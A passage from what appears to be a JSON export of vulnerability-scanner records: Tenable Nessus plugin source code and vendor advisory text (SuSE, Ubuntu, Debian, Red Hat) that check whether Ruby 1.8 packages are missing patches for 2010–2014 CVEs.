value:\"http://support.novell.com/security/cve/CVE-2011-2705.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4815.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5716.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"ruby-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"ruby-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"ruby-doc-html-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"ruby-tk-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"ruby-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"ruby-doc-html-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"ruby-tk-1.8.7.p357-0.7.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:58:56", "description": "Drew Yao discovered that the WEBrick HTTP server was vulnerable to cross-site scripting attacks when displaying error pages. A remote attacker could use this flaw to run arbitrary web script.\n(CVE-2010-0541)\n\nDrew Yao discovered that Ruby's BigDecimal module did not properly allocate memory on 64-bit platforms. An attacker could use this flaw to cause a denial of service or possibly execute arbitrary code with user privileges. (CVE-2011-0188)\n\nNicholas Jefferson discovered that the FileUtils.remove_entry_secure method in Ruby did not properly remove non-empty directories. An attacker could use this flaw to possibly delete arbitrary files.\n(CVE-2011-1004)\n\nIt was discovered that Ruby incorrectly allowed untainted strings to be modified in protective safe levels. An attacker could use this flaw to bypass intended access restrictions. (CVE-2011-1005)\n\nEric Wong discovered that Ruby does not properly reseed its pseudorandom number generator when creating child processes. An attacker could use this flaw to gain knowledge of the random numbers used in other Ruby child processes. (CVE-2011-2686)\n\nEric Wong discovered that the SecureRandom module in Ruby did not properly seed its pseudorandom number generator. An attacker could use this flaw to gain knowledge of the random numbers used by another Ruby process with the same process ID number. (CVE-2011-2705)\n\nAlexander Klink and Julian Walde discovered that Ruby computed hash values without restricting the ability to trigger hash collisions predictably. A remote attacker could cause a denial of service by crafting values used in hash tables. (CVE-2011-4815).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-28T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : ruby1.8 vulnerabilities (USN-1377-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0541", "CVE-2011-0188", "CVE-2011-1004", "CVE-2011-1005", "CVE-2011-2686", "CVE-2011-2705", "CVE-2011-4815"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libruby1.8", "p-cpe:/a:canonical:ubuntu_linux:ruby1.8", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10"], "id": "UBUNTU_USN-1377-1.NASL", "href": "https://www.tenable.com/plugins/nessus/58146", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1377-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58146);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2010-0541\", \"CVE-2011-0188\", \"CVE-2011-1004\", \"CVE-2011-1005\", \"CVE-2011-2686\", \"CVE-2011-2705\", \"CVE-2011-4815\");\n script_bugtraq_id(40895, 46458, 46460, 46966, 49015, 51198);\n script_xref(name:\"USN\", value:\"1377-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : ruby1.8 vulnerabilities (USN-1377-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Drew Yao discovered that the WEBrick HTTP server was vulnerable to\ncross-site scripting attacks when displaying error pages. A remote\nattacker could use this flaw to run arbitrary web script.\n(CVE-2010-0541)\n\nDrew Yao discovered that Ruby's BigDecimal module did not properly\nallocate memory on 64-bit platforms. An attacker could use this flaw\nto cause a denial of service or possibly execute arbitrary code with\nuser privileges. (CVE-2011-0188)\n\nNicholas Jefferson discovered that the FileUtils.remove_entry_secure\nmethod in Ruby did not properly remove non-empty directories. An\nattacker could use this flaw to possibly delete arbitrary files.\n(CVE-2011-1004)\n\nIt was discovered that Ruby incorrectly allowed untainted strings to\nbe modified in protective safe levels. An attacker could use this flaw\nto bypass intended access restrictions. (CVE-2011-1005)\n\nEric Wong discovered that Ruby does not properly reseed its\npseudorandom number generator when creating child processes. An\nattacker could use this flaw to gain knowledge of the random numbers\nused in other Ruby child processes. (CVE-2011-2686)\n\nEric Wong discovered that the SecureRandom module in Ruby did not\nproperly seed its pseudorandom number generator. An attacker could use\nthis flaw to gain knowledge of the random numbers used by another Ruby\nprocess with the same process ID number. (CVE-2011-2705)\n\nAlexander Klink and Julian Walde discovered that Ruby computed hash\nvalues without restricting the ability to trigger hash collisions\npredictably. A remote attacker could cause a denial of service by\ncrafting values used in hash tables. (CVE-2011-4815).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1377-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libruby1.8 and / or ruby1.8 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libruby1.8\", pkgver:\"1.8.7.249-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"ruby1.8\", pkgver:\"1.8.7.249-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libruby1.8\", pkgver:\"1.8.7.299-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"ruby1.8\", pkgver:\"1.8.7.299-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libruby1.8\", pkgver:\"1.8.7.302-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"ruby1.8\", pkgver:\"1.8.7.302-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libruby1.8\", pkgver:\"1.8.7.352-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"ruby1.8\", pkgver:\"1.8.7.352-2ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby1.8 / ruby1.8\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:56:08", "description": "This update fixes multiple local and remote denial of service and remote code execute problems :\n\nCVE-2011-0188 Properly allocate memory, to prevent arbitrary code execution or application crash. Reported by Drew Yao.\n\nCVE-2011-2686\n\nReinitialize the random seed when forking to prevent CVE-2003-0900 like situations.\n\nCVE-2011-2705 Modify PRNG state to prevent random number sequence repeatation at forked child process which has same pid. Reported by Eric Wong.\n\nCVE-2011-4815\n\nFix a problem with predictable hash collisions resulting in denial of service (CPU consumption) attacks. Reported by Alexander Klink and Julian Waelde.\n\nCVE-2014-8080\n\nFix REXML parser to prevent memory consumption denial of service via crafted XML documents. Reported by Willis Vandevanter.\n\nCVE-2014-8090\n\nAdd REXML::Document#document to complement the fix for CVE-2014-8080.\nReported by Tomas Hoger.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-88-1 : ruby1.8 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0900", "CVE-2011-0188", "CVE-2011-2686", "CVE-2011-2705", "CVE-2011-4815", "CVE-2014-8080", "CVE-2014-8090"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libruby1.8", "p-cpe:/a:debian:debian_linux:libruby1.8-dbg", "p-cpe:/a:debian:debian_linux:libtcltk-ruby1.8", "p-cpe:/a:debian:debian_linux:ri1.8", "p-cpe:/a:debian:debian_linux:ruby1.8", "p-cpe:/a:debian:debian_linux:ruby1.8-dev", "p-cpe:/a:debian:debian_linux:ruby1.8-elisp", "p-cpe:/a:debian:debian_linux:ruby1.8-examples", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-88.NASL", "href": "https://www.tenable.com/plugins/nessus/82233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-88-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82233);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0188\", \"CVE-2011-2686\", \"CVE-2011-2705\", \"CVE-2011-4815\", \"CVE-2014-8080\", \"CVE-2014-8090\");\n script_bugtraq_id(46950, 46966, 49015, 51198, 70935, 71230);\n\n script_name(english:\"Debian DLA-88-1 : ruby1.8 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes multiple local and remote denial of service and\nremote code execute problems :\n\nCVE-2011-0188 Properly allocate memory, to prevent arbitrary code\nexecution or application crash. Reported by Drew Yao.\n\nCVE-2011-2686\n\nReinitialize the random seed when forking to prevent CVE-2003-0900\nlike situations.\n\nCVE-2011-2705 Modify PRNG state to prevent random number sequence\nrepeatation at forked child process which has same pid. Reported by\nEric Wong.\n\nCVE-2011-4815\n\nFix a problem with predictable hash collisions resulting in denial of\nservice (CPU consumption) attacks. Reported by Alexander Klink and\nJulian Waelde.\n\nCVE-2014-8080\n\nFix REXML parser to prevent memory consumption denial of service via\ncrafted XML documents. Reported by Willis Vandevanter.\n\nCVE-2014-8090\n\nAdd REXML::Document#document to complement the fix for CVE-2014-8080.\nReported by Tomas Hoger.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2014/11/msg00007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/ruby1.8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby1.8-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtcltk-ruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ri1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.8-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.8-elisp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.8-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libruby1.8\", reference:\"1.8.7.302-2squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libruby1.8-dbg\", reference:\"1.8.7.302-2squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libtcltk-ruby1.8\", reference:\"1.8.7.302-2squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ri1.8\", reference:\"1.8.7.302-2squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ruby1.8\", reference:\"1.8.7.302-2squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ruby1.8-dev\", reference:\"1.8.7.302-2squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ruby1.8-elisp\", reference:\"1.8.7.302-2squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ruby1.8-examples\", reference:\"1.8.7.302-2squeeze3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:59:24", "description": "Updated ruby packages that fix two security issues, various bugs, and add one enhancement are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to do system management tasks.\n\nIt was found that Ruby did not reinitialize the PRNG (pseudorandom number generator) after forking a child process. This could eventually lead to the PRNG returning the same result twice. An attacker keeping track of the values returned by one child process could use this flaw to predict the values the PRNG would return in other child processes (as long as the parent process persisted). (CVE-2011-3009)\n\nA flaw was found in the Ruby SecureRandom module. When using the SecureRandom.random_bytes class, the PRNG state was not modified after forking a child process. This could eventually lead to SecureRandom.random_bytes returning the same string more than once. An attacker keeping track of the strings returned by one child process could use this flaw to predict the strings SecureRandom.random_bytes would return in other child processes (as long as the parent process persisted). (CVE-2011-2705)\n\nThis update also fixes the following bugs :\n\n* The ruby package has been upgraded to upstream point release 1.8.7-p352, which provides a number of bug fixes over the previous version. (BZ#706332)\n\n* The MD5 message-digest algorithm is not a FIPS-approved algorithm.\nConsequently, when a Ruby script attempted to calculate an MD5 checksum in FIPS mode, the interpreter terminated unexpectedly. This bug has been fixed and an exception is now raised in the described scenario. (BZ#717709)\n\n* Due to inappropriately handled line continuations in the mkconfig.rb source file, an attempt to build the ruby package resulted in unexpected termination. An upstream patch has been applied to address this issue and the ruby package can now be built properly. (BZ#730287)\n\n* When the 32-bit ruby-libs library was installed on a 64-bit machine, the mkmf library failed to load various modules necessary for building Ruby-related packages. This bug has been fixed and mkmf now works properly in the described scenario. (BZ#674787)\n\n* Previously, the load paths for scripts and binary modules were duplicated on the i386 architecture. Consequently, an ActiveSupport test failed. With this update, the load paths are no longer stored in duplicates on the i386 architecture. (BZ#722887)\n\nThis update also adds the following enhancement :\n\n* With this update, SystemTap probes have been added to the ruby package. (BZ#673162)\n\nAll users of ruby are advised to upgrade to these updated packages, which resolve these issues and add this enhancement.", "cvss3": {"score": null, "vector": null}, "published": "2011-12-06T00:00:00", "type": "nessus", "title": "RHEL 6 : ruby (RHSA-2011:1581)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-3009"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:ruby", "p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo", "p-cpe:/a:redhat:enterprise_linux:ruby-devel", "p-cpe:/a:redhat:enterprise_linux:ruby-docs", "p-cpe:/a:redhat:enterprise_linux:ruby-irb", "p-cpe:/a:redhat:enterprise_linux:ruby-libs", "p-cpe:/a:redhat:enterprise_linux:ruby-rdoc", "p-cpe:/a:redhat:enterprise_linux:ruby-ri", "p-cpe:/a:redhat:enterprise_linux:ruby-static", "p-cpe:/a:redhat:enterprise_linux:ruby-tcltk", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2011-1581.NASL", "href": "https://www.tenable.com/plugins/nessus/57017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1581. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57017);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2705\", \"CVE-2011-3009\");\n script_bugtraq_id(49015, 49126);\n script_xref(name:\"RHSA\", value:\"2011:1581\");\n\n script_name(english:\"RHEL 6 : ruby (RHSA-2011:1581)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix two security issues, various bugs, and\nadd one enhancement are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nIt was found that Ruby did not reinitialize the PRNG (pseudorandom\nnumber generator) after forking a child process. This could eventually\nlead to the PRNG returning the same result twice. An attacker keeping\ntrack of the values returned by one child process could use this flaw\nto predict the values the PRNG would return in other child processes\n(as long as the parent process persisted). (CVE-2011-3009)\n\nA flaw was found in the Ruby SecureRandom module. When using the\nSecureRandom.random_bytes class, the PRNG state was not modified after\nforking a child process. This could eventually lead to\nSecureRandom.random_bytes returning the same string more than once. An\nattacker keeping track of the strings returned by one child process\ncould use this flaw to predict the strings SecureRandom.random_bytes\nwould return in other child processes (as long as the parent process\npersisted). (CVE-2011-2705)\n\nThis update also fixes the following bugs :\n\n* The ruby package has been upgraded to upstream point release\n1.8.7-p352, which provides a number of bug fixes over the previous\nversion. (BZ#706332)\n\n* The MD5 message-digest algorithm is not a FIPS-approved algorithm.\nConsequently, when a Ruby script attempted to calculate an MD5\nchecksum in FIPS mode, the interpreter terminated unexpectedly. This\nbug has been fixed and an exception is now raised in the described\nscenario. (BZ#717709)\n\n* Due to inappropriately handled line continuations in the mkconfig.rb\nsource file, an attempt to build the ruby package resulted in\nunexpected termination. An upstream patch has been applied to address\nthis issue and the ruby package can now be built properly. (BZ#730287)\n\n* When the 32-bit ruby-libs library was installed on a 64-bit machine,\nthe mkmf library failed to load various modules necessary for building\nRuby-related packages. This bug has been fixed and mkmf now works\nproperly in the described scenario. (BZ#674787)\n\n* Previously, the load paths for scripts and binary modules were\nduplicated on the i386 architecture. Consequently, an ActiveSupport\ntest failed. With this update, the load paths are no longer stored in\nduplicates on the i386 architecture. (BZ#722887)\n\nThis update also adds the following enhancement :\n\n* With this update, SystemTap probes have been added to the ruby\npackage. (BZ#673162)\n\nAll users of ruby are advised to upgrade to these updated packages,\nwhich resolve these issues and add this enhancement.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3009\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1581\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n 